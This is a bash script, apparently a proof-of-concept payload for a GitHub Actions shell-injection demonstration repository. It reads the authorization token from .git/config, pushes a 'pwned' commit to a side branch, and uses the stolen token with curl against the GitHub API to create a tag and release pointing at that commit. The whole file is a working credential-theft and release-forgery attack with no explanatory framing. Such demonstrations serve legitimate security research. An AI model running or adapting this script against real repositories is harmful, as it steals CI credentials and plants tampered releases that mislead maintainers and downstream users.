#!/usr/bin/env bash

authfield=$(cat .git/config | grep AUTHORIZATION | cut -d':' -f 2)

SIDE_BRANCH="side-branch"
RELEASE="v1.0.4"

# Create content in a side branch
echo pwned > pwned.txt
git checkout -b $SIDE_BRANCH
git add pwned.txt
git commit -m ""
git push origin $SIDE_BRANCH

commit_hash=$(git rev-parse HEAD)
  
# Create a tag using the side branch
curl --request POST \
  --url https://api.github.com/repos/minusworld-gha-demo/shell-injection/git/refs \
  --header "Authorization: $authfield" \
  --header "Accept: application/vnd.github.v3+json" \
  --data "{ \"ref\": \"refs/tags/$RELEASE\", \"sha\": \"$commit_hash\" }"

# Create release
curl --request POST \
  --url https://api.github.com/repos/minusworld-gha-demo/shell-injection/releases \
  --header "Authorization: $authfield" \
  --header "Accept: application/vnd.github.v3+json" \
  --data "{ \"tag_name\": \"$RELEASE\", \"target_commitish\": \"$commit_hash\" }"
